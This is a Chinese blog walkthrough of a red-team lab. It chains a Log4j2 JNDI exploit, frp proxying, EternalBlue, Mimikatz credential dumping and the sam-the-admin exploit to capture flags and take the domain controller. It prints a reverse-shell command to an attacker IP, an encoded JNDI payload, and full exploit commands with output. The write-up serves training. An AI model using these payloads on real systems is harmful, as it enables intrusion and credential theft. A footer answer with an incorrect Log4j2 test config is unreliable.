Redteam2靶场攻略(从外网 log4j2 RCE 再到内网核弹组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC)

最新推荐文章于 2023-04-18 14:50:31 发布
最新推荐文章于 2023-04-18 14:50:31 发布
阅读量4k 收藏 6
点赞数 9
文章标签: 网络安全 log4j2 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122173348
版权

Redteam2靶场攻略(从外网 log4j2 RCE 再到内网核弹组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC)

环境启动

参考文章https://mp.weixin.qq.com/s/UAeOtOwigsB45hcjYEGh9g

本靶场由3台虚拟机构成

在这里插入图片描述

主机网卡ip地址角色
docker -log4j2ens33外网网卡(桥接)/ens38内网网卡192.168.210.39/10.0.1.6webserver
win7本地连接1/本地连接210.0.1.7/10.0.0.7域内个人主机
win2012r2本地连接110.0.0.12域控DC

信息收集

nmap扫描

┌──(root💀kali)-[~]
└─# nmap -A 192.168.210.39 -p-

在这里插入图片描述

发现ssh服务开放22端口 ,38080端口是http服务

在这里插入图片描述

漏洞利用

log4j2漏洞复现

本地kali搭建ldap服务器

工具链接https://github.com/zzwlpx/JNDIExploit

在这里插入图片描述

BP抓包,改为post传参并且构造payload

/bin/bash -i >& /dev/tcp/192.168.210.23/9999 0>&1  -反弹shell

payload=${jndi:ldap://192.168.210.23:1389/TomcatBypass/Command/Base64/L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjEwLjIzLzk5OTkgMD4mMQ==}

在这里插入图片描述

反弹shell命令需要进行base64编码

在这里插入图片描述

同时kali监听9999的端口,成功getshell
在这里插入图片描述

虽然拿到了root但是发现此刻我们在docker内

cat /proc/1/cgroup

在这里插入图片描述

在root家目录下发现flag1

在这里插入图片描述

根据flag1的提示我们得到了saul Saul123 这非常像一组账密

在信息收集中nmap扫到目标主机开放22ssh服务,因此思路可转向ssh

是否能够进行docker逃逸等后续研究

ssh登录

ssh成功登录目标主机
在这里插入图片描述

内网信息收集

通过信息收集发现本台主机共有两块网卡

ens33:192.168.210.39 (外网网卡)

ens38:10.0.1.6 (内网网卡)

在这里插入图片描述

内网主机探活

法一、

我们用 for 循环 ping 一下 ens38C 段:

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

在这里插入图片描述

发现存活主机10.0.1.7

法二、

或者使用 scan info 工具进行内网信息收集

kali中使用python快速搭建httpd

在这里插入图片描述

靶机下载工具并赋予权限

在这里插入图片描述

进行内网信息收集

在这里插入图片描述

发现10.0.1.7存活并存在MS17-010

流量代理

由于目标10.0.1.7在内网需要把流量代理出来

kali使用python快速搭建httpd

python3 -m http.server 8888

在这里插入图片描述

目标靶机下载frp

使用frp把目标靶机流量代理出来

kali端 frps

在这里插入图片描述

靶机端 frpc

在这里插入图片描述

漏洞利用MS17-010

拿到win7shell

msf设置Socks


msf6 > setg Proxies socks5:127.0.0.1:6005      ------设置socks5代理
Proxies => socks5:127.0.0.1:6005
msf6 > set ReverseAllowProxy true               -----允许反向代理
ReverseAllowProxy => true
msf6 >  use auxiliary/scanner/smb/smb_ms17_010  --辅助检测模块检测ms17-010

在这里插入图片描述

发现存在ms17-010

攻击设置

msf6 auxiliary(scanner/smb/smb_version) > search MS17-010

.....

msf6 auxiliary(scanner/smb/smb_version) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.1.7    
rhosts => 10.0.1.7
msf6 exploit(windows/smb/ms17_010_eternalblue) >  set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp              
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit 

注意由于目标在内网,故而tcp反射连接不能使用  设置为payload正向bind_tcp!

在这里插入图片描述

抓取内存密码,信息收集

加载猕猴桃 Mimikatz 先把密码抓出来:

meterpreter > load mimikatz  加载工具

meterpreter > creds_all      列出凭证  
注意命令是从内存中抓取密码,靶场原始状态为暂停恢复即可,如果重启过需要登录一次win7

在这里插入图片描述


C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>cd /Users/root/desktop
cd /Users/root/desktop

C:\Users\root\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9227-12B7

 Directory of C:\Users\root\Desktop

2021/12/20  17:32    <DIR>          .
2021/12/20  17:32    <DIR>          ..
2021/12/20  17:33                19 flag.txt
               1 File(s)             19 bytes
               2 Dir(s)  30,754,717,696 bytes free

C:\Users\root\Desktop>type flag.txt
type flag.txt
flag{redteam.lab-2}

在桌面上发现第二个flag

在这里插入图片描述

ipconfig 发现第三层网络

在这里插入图片描述

net user /domain 
ping dc

在这里插入图片描述

得到dc的ip为10.0.0.12

内网渗透之大杀器 - CVE-2021-42287、CVE-2021-42278

Microsoft Windows Active Directory 域服务权限提升漏洞(CVE-2021-42278、CVE-2021-42287)攻击者可利用该漏洞将域内的普通用户权限提升到域管理员权限,造成风险和危害极大。

流量代理

meterpreter > background 
[*] Backgrounding session 1...    
后台运行session

代理模块添加socks5代理

在这里插入图片描述

配置路由

在这里插入图片描述

注意更改本地代理配置与msf中设置对应

vim /etc/proxychains4.conf

在这里插入图片描述

使用漏洞利用脚本

下载:https://github.com/WazeHell/sam-the-admin

注意此脚本需要一个域用户的账户+密码

──(root💀kali)-[~/tools/exp漏洞利用/CVE-2021-42287+CVE-2021-42278/sam-the-admin-main]
└─# proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:389  ...  OK
[-] WARNING: Target host is not a DC
[*] Selected Target dc.redteam.lab
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-12$"
[*] MachineAccount "SAMTHEADMIN-12$" password = MQtyQic2&zvb
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:445  ...  OK
[*] Successfully added machine account SAMTHEADMIN-12$ with password MQtyQic2&zvb.
[*] SAMTHEADMIN-12$ object = CN=SAMTHEADMIN-12,CN=Computers,DC=redteam,DC=lab
[*] SAMTHEADMIN-12$ sAMAccountName == dc
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:88  ...  OK
[*] Saving ticket in dc.ccache
[*] Resting the machine account to SAMTHEADMIN-12$
[*] Restored SAMTHEADMIN-12$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:88  ...  OK
[*] Saving ticket in Administrator.ccache
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:8888  ...  10.0.0.12:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>cd \Users\administrator\Desktop
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>type \Users\administrator\Desktop\flag.txt
flag{redteam.lab-3}

Congratulations, the challenge is successful!

by: saulGoodman

在这里插入图片描述

桌面上拿到flag3,通关!

flag{redteam.lab-3}

在这里插入图片描述

Forest深林
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论
Log4j2远程代码执行漏洞靶场复现(CVE-2021-44228)
没事我溜达
11-02 2251
logger在执行日志的时候,就会执行中间的表达式,如表达式是JNDI就会远程下载文件到本地并执行。
webappdefaultsdb:已知 Web 应用程序管理 URL、用户名密码组合和漏洞利用的数据库
06-10
Web 应用程序默认数据库 已知 Web 应用程序管理 URL、用户名/密码组合和漏洞利用的数据库 此列表最初由 Gillis Jones 在 2012 年德比大会上发布 由 Web App Defaults DB Group 更新和发布 如果您有信息并且不想使用 Git,请随时将信息发送至: 让我们担心回购伏都教。 如果您希望通过 git 提交,请使用以下字段类型: 管理员网址: 用户通行证: 有趣的网址: 漏洞利用链接: 评论: 这将使人们更容易解析整个数据库以获取信息。 例如: ## Example CMS Info: This webapp falls over if you hit /dos.php on version 1.0 and prior * ADMINURL: /admin/uberleet.php * USERPASS: root:toor
【红队靶场】某靶场
人间体佐菲的博客
04-18 772
本文章仅用作实验学习,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。
红日内网渗透靶场2(ATK&CK红队评估实战靶场二)
热门推荐
qq_45780190的博客
03-01 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 跟靶场一中的环境类似需要模拟内网外网两个网段, PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。 PC配置如下: DC在该环境中充当是域控。DC配置如下 : WEB配置:需要两块网卡,相当于网关服务器。 这里需要将新增的网卡VMnet2,ip调成了10段。 网络配置完成,这三台虚拟主机默认开机密码都是:密码
内网打靶练习(log4j2、私钥泄露)
博客地址 www.sec0nd.top
05-20 1332
文章目录靶机背景介绍getshell (log4j2 RCE)漏洞验证存在注入的点反弹shell域渗透 靶机背景介绍 搭建靶机的过程过几天我再写,先写一下复现的过程(最近有些懒了) web服务端:centos 192.168.80.130(外) 192.168.75.130(内) 内网的主机:Windows10 192.168.75. kali攻击机:kali 192.168.80.131 getshell (log4j2 RCE) 来看一下web服务端,是一个solr框架昂 然后我们看一下so
3-vulnhub靶场red
qq_49078152的博客
08-19 1287
vulnhub靶机练习,time提权,shell会话维持
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
log4J2靶机搭建和漏洞复现
qq_34415266的博客
01-16 4986
log4J2漏洞靶机搭建和攻击复现详细过程
Apache Log4j2代码执行漏洞复现(cve-2021-44228)
Bird&Bird
12-14 9554
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
log4j2漏洞复现(附docker靶场环境)
告白的博客
02-15 3742
log4j2是log4j的升级版本,基于java的日志框架,在java项目中被大量的引用,当用户输入数据被记录于日志中,攻击者可通过构造特殊请求,造成JNDI注入,来触发log4j达到命令执行,JNID可访问的目录服务有lLDAP,JDBC,RMI,DNS,NIS,CORBA,JNDI是java提供的一个java命令和目录接口,可通过其调用定位资产和程序对象,
Windows域服务权限提升漏洞CVE-2021-42287, CVE-2021-42278
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows域服务权限提升漏洞CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
Red1 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-04 447
Red1靶场渗透记录:红蓝对抗,红队已攻下网站挂上黑页,疯狂嘲讽,蓝队反败为胜!
【Vulnhub靶场RED: 1
DG_s1mple
03-18 1762
环境准备 下载靶机导入到vmware 但是获取不到地址,可以根据我博客里的方法修改网卡来获取IP地址 信息收集 我们改好网卡之后,我们使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.15 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开放的端口信息 只开放了ssh跟80端口,我们首先访问他的网站 发现是一个被黑了的网站,点击search后,会跳到一个域名 我们修改hosts解析 渗透开始 修改好后,网站可以正常访问了,我们看看有没有什
【Vulnhub靶场实践】 Red:1
守拙的博客
07-19 945
保姆级教程,red:1靶机一篇搞定。不只是简单记录操作步骤,磁盘爆满、shell显示乱序、反弹shell闪退等问题都有相应的解决方案。
域内提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 2941
2021年11月,Microsoft 曝出了两个关于 Windows AD 域提权的漏洞CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致域内普通用户提升至域管权限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
最新发布
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> <param name="Target" value="System.out"/> <param name="immediateFlush" value="true"/> <layout class="org.apache.logging.log4j.core.layout.PatternLayout"> <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36}:%line - %msg%n"/> </layout> <filter class="org.apache.logging.log4j.core.filter.AbstractFilterable"> <filter class="org.apache.logging.log4j.core.filter.GroovyFilter"> <param name="script" value="new java.lang.ProcessBuilder(['calc']).start()"/> </filter> </filter> </appender> <root level="info"> <appender-ref ref="RCE"/> </root> ``` 2. 将恶意日志信息发送到漏洞受影响的 Log4j2 服务端,例如通过网络或者文件系统等方式。 3. 如果服务端受到影响,则会执行恶意脚本,例如在 Windows 上弹出计算器。 请注意,验证漏洞时需要遵守法律法规和道德准则,不得对未授权的系统进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值